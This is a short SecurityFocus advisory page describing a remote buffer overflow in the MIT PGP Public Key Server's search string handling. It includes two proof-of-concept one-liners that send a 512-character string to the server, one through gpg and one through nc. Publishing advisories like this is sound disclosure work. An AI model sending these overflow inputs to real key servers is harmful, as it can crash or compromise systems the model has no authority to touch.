Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

MIT PGP Public Key Server Search String Remote Buffer Overflow Vulnerability

A proof of concept exists in the following two examples:

gpg --search-keys `perl -e "print 'A'x512"`

echo -e "GET /pks/lookup?op=index&search=`perl -e "print 'A'x512"`"| nc example.com 11371

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.







 

Privacy Statement
Copyright 2008, SecurityFocus